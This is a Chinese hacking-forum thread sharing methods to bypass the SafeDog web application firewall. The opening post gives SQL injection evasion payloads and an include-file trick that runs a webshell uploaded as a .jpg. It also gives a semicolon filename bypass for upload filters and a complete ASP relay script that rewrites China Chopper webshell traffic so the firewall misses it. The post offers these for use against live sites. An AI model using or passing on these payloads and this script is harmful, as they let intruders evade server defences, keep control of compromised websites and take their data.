查看: 10758|回复: 4

过安全狗技术汇总【转载】

[复制链接]
  • TA的每日心情
    擦汗
    2015-12-28 00:09
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2013-9-22 11:39:46 | 显示全部楼层 |阅读模式
    安全狗很牛吗?
    无视!!
    过安全狗主要过哪几方面:
    作者:鬼哥
    版权:www.90sec.org
    1.过注入
    2.过大马被阻拦访问
    3.过菜刀连接一句话被拦截
    4.过1.asp;.jpg这样的文件
    其他我没遇到了。。
    现在一点一点讲:
    1.过注入
    方法一:a.asp?aaa=%00&id=sql语句           
    方法二: a.asp?id=sql语句   里面把安全过滤的加个%l 比如: un%aion sel%aect 1,2,3,4 fr%aom admin
    2.过大马被阻拦访问
    方法一:上传一个大马 然后访问http://url/dama.asp  访问后出现拦截。
    那么解决方法 先将dama.asp改名dama.jpg上传,然后在同目录上传个文件da.asp 内容为: <!--#include file="dama.jpg" -->  这样再访问da.asp  就不会被拦截了。
    3.过菜刀连接一句话被拦截
    方法一:不用菜刀连接一句话,用别的一句话连接端。
    方法二:中转下连接菜刀,把过滤掉的词替换掉。
    4.过1.asp;.jpg这样的文件拦截
    方法一:;1.asp;.jpg
    方法二:保密
    具体就为大家总结这么多了,安全狗 反正基本可以无视了!!
    大家还有什么要补充的可以发在下面!
    下面这个脚本是过安全狗连接菜刀用的 用法: 先把这个脚本放到个可执行.asp的目录
    然后访问http://url/asf.asp?dz=你要过的那个webshell地址
    然后把地址输入进菜刀 密码还是你要过的那个webshell的密码 类型也是选择那个一句话木马的后缀类型
    例如:http://url/asf.asp?dz=http://url/yijuhua.php 密码
    这样输入就菜刀
    这个脚本暂时支持.php .aspx的一句话连接  .asp的可能还不行 没测试过。如果谁有装了安全狗的webshell可以告诉我下。我再测试下把这个脚本修改全面都支持!
    <%  
    '饶过的原理,抓菜刀连接webshell的包 然后研究<STRONG><FONT color=#ff0000>安全狗</FONT></STRONG>过滤了哪些关键字 中转替换掉那些过滤的关键字 就成!  
    JmStr=Replace(Request.Form,"$_POST","$_REQUEST")  
    JmStr=Replace(JmStr,"->|","-->|")  
    JmStr=Replace(JmStr,"@eval(","@eval   (")  
    JmStr=Replace(JmStr,"System.Convert.FromBase64String","System.Convert. FromBase64String")  
    JMUrl=request("dz")  
    response.write  request("dz")  
    JmRef=JMUrl  
    JmCok=""
    '作者: 鬼哥  
    '菜刀突破<STRONG><FONT color=#ff0000>安全狗</FONT></STRONG>连接!  
    'www.90sec.org  
    response.write  PostData(JMUrl,JmStr,JmCok,JmRef)  

    Function PostData(PostUrl,PostStr,PostCok,PostRef)   
    Dim Http  
    Set Http = Server.CreateObject("msxml2.serverXMLHTTP")  
    With Http  
    .Open "POST",PostUrl,False  
    .SetRequestHeader "Content-Length",Len(PostStr)  
    .SetRequestHeader "Content-Type","application/x-www-form-urlencoded"
    .SetRequestHeader "Referer",PostRef  
    '.SetRequestHeader "Cookie",PostCok  
    .Send PostStr  
    PostData = .ResponseBody   
    End With  
    Set Http = Nothing  
    PostData =bytes2BSTR(PostData)  
    End Function  

    Function bytes2BSTR(vIn)  
    Dim strReturn  
    Dim I, ThisCharCode, NextCharCode  
    strReturn = ""
    For I = 1 To LenB(vIn)  
    ThisCharCode = AscB(MidB(vIn, I, 1))  
    If ThisCharCode < &H80 Then  
    strReturn = strReturn & Chr(ThisCharCode)  
    Else  
    NextCharCode = AscB(MidB(vIn, I + 1, 1))  
    strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))  
    I = I + 1  
    End If  
    Next  
    bytes2BSTR = strReturn  
    End Function  

    Function URLEncoding(vstrin)   
    strReturn=""
    Dim i  
    For i=1 To Len(vstrin)  
    ThisChr=Mid(vstrin,i,1)  
    if Abs(Asc(ThisChr))< &HFF Then  
    strReturn=strReturn & ThisChr  
    Else  
    InnerCode=Asc(ThisChr)  
    If InnerCode<0 Then  
    InnerCode=InnerCode + &H10000  
    End If  
    Hight1=(InnerCode And &HFF00) \&HFF  
    Low1=InnerCode And &HFF  
    strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)  
    End if
    Next  
    strReturn=Replace(strReturn,chr(32),"%20") '转换空格,如果网站过滤了空格,尝试用/**/来代替%20  
    strReturn=Replace(strReturn,chr(43),"%2B")  'JMDCW增加转换+字符  
    'strReturn=Replace(strReturn,过滤字符,"转换为字符")  '在此增加要过滤的代码  
    URLEncoding=strReturn  
    End Function  

    %>
    回复

    使用道具 举报

  • TA的每日心情

    2020-12-4 20:42
  • 签到天数: 23 天

    [LV.4]偶尔看看III

    发表于 2013-9-22 16:33:17 | 显示全部楼层
    {:soso_e101:}  LZ. 这个很久了吧。。。。
    回复 支持 反对

    使用道具 举报

    suner 该用户已被删除
    发表于 2013-9-24 06:54:23 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2013-9-24 16:37:40 | 显示全部楼层
      目测这贴子 和法客那个贴子一样  还花了我一金币
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2013-9-24 16:38:20 | 显示全部楼层
      目测这贴子 和法客那个贴子一样  还花了我一金币
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-15 07:34 , Processed in 0.038201 second(s), 18 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部